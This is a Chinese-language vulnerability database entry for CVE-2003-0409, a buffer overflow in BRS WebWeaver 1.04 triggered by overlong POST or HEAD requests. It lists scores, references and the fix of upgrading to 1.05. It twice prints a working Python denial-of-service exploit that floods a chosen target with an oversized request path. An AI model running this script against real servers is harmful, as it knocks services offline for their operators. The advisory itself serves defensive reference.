CVE-2003-0409
CVSS10.0
发布时间 :2003-06-30 00:00:00
修订时间 :2016-10-17 22:33:38
NMCOES    

[原文]Buffer overflow in BRS WebWeaver 1.04 and earlier allows remote attackers to cause a denial of service (crash) and possibly execute arbitrary code via a long HTTP (1) POST or (2) HEAD request.


[CNNVD]BRS WebWeaver POST及HEAD拒绝服务漏洞(CNNVD-200306-120)

        BRS WebWeaver 1.04及其之前版本存在缓冲区溢出漏洞。远程攻击者可以借助一个超长HTTP(1)POST,或(2)HEAD请求导致服务拒绝(崩溃),可能还可以执行任意代码。

- CVSS (基础分值)

CVSS分值: 10 [严重(HIGH)]
机密性影响: [--]
完整性影响: [--]
可用性影响: [--]
攻击复杂度: [--]
攻击向量: [--]
身份认证: [--]

- CPE (受影响的平台与产品)

产品及版本信息(CPE)暂不可用

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0409
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2003-0409
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200306-120
(官方数据源) CNNVD

- 其它链接及资源

http://marc.info/?l=bugtraq&m=105405836025160&w=2
(UNKNOWN)  BUGTRAQ  20030527 BRS WebWeaver: POST and HEAD Overflaws
http://www.iss.net/security_center/static/12107.php
(VENDOR_ADVISORY)  XF  webweaver-head-post-bo(12107)
http://www.securityfocus.com/bid/7695
(VENDOR_ADVISORY)  BID  7695

- 漏洞信息

BRS WebWeaver POST及HEAD拒绝服务漏洞
危急 缓冲区溢出
2003-06-30 00:00:00 2005-10-20 00:00:00
远程  
        BRS WebWeaver 1.04及其之前版本存在缓冲区溢出漏洞。远程攻击者可以借助一个超长HTTP(1)POST,或(2)HEAD请求导致服务拒绝(崩溃),可能还可以执行任意代码。

- 公告与补丁

        Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: vuldb@securityfocus.com .

- 漏洞信息 (22650)

BRS WebWeaver 1.0 4 POST and HEAD Denial Of Service Vulnerability (EDBID:22650)
multiple dos
2003-05-26 Verified
0 euronymous
N/A [点击下载]
source: http://www.securityfocus.com/bid/7695/info

When WebWeaver receives unusually long POST or HEAD requests, a denial of service condition may result. Restarting WebWeaver will allow normal operation to resume.

This vulnerability was reported for WebWeaver 1.04. Earlier versions may also be vulnerable. 

}------- start of fadvWWhtdos.py ---------------{

#! /usr/bin/env python
###
# WebWeaver 1.04 Http Server DoS exploit
# by euronymous /f0kp [http://f0kp.iplus.ru]
########
# Usage: ./fadvWWhtdos.py
########

import sys
import httplib

met = raw_input("""
What kind request you want make to crash webweaver?? [ HEAD/POST ]:
""")
target = raw_input("Type your target hostname [ w/o http:// ]: ")
spl = "f0kp"*0x1FEF
conn = httplib.HTTPConnection(target)
conn.request(met, "/"+spl)
r1 = conn.getresponse()
print r1.status

}--------- end of fadvWWhtdos.py ---------------{ 		

- 漏洞信息

4851
BRS WebWeaver HTTP POST/HEAD Request Overflow
Remote / Network Access Denial of Service, Input Manipulation
Loss of Integrity, Loss of Availability
Exploit Public

- 漏洞描述

BRS WebWeaver contains a flaw that may allow a remote denial of service. The issue is triggered when executing arbitrary code via a long HTTP POST or HEAD request, and will result in loss of availability for the system.

- 时间线

2003-05-27 2003-05-25
Unknow Unknow

- 解决方案

Upgrade to version 1.05 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.

- 相关参考

- 漏洞作者

- 漏洞信息

BRS WebWeaver POST and HEAD Denial Of Service Vulnerability
Boundary Condition Error 7695
Yes No
2003-05-26 12:00:00 2009-07-11 10:06:00
Discovery is credited to euronymous <just-a-user@yandex.ru>.

- 受影响的程序版本

BRS WebWeaver 1.0 4

- 漏洞讨论

When WebWeaver receives unusually long POST or HEAD requests, a denial of service condition may result. Restarting WebWeaver will allow normal operation to resume.

This vulnerability was reported for WebWeaver 1.04. Earlier versions may also be vulnerable.

- 漏洞利用

The following exploit was provided:

}------- start of fadvWWhtdos.py ---------------{

#! /usr/bin/env python
###
# WebWeaver 1.04 Http Server DoS exploit
# by euronymous /f0kp [http://f0kp.iplus.ru]
########
# Usage: ./fadvWWhtdos.py
########

import sys
import httplib

met = raw_input("""
What kind request you want make to crash webweaver?? [ HEAD/POST ]:
""")
target = raw_input("Type your target hostname [ w/o http:// ]: ")
spl = "f0kp"*0x1FEF
conn = httplib.HTTPConnection(target)
conn.request(met, "/"+spl)
r1 = conn.getresponse()
print r1.status

}--------- end of fadvWWhtdos.py ---------------{

- 解决方案

Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: vuldb@securityfocus.com <mailto:vuldb@securityfocus.com>.

- 相关参考

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站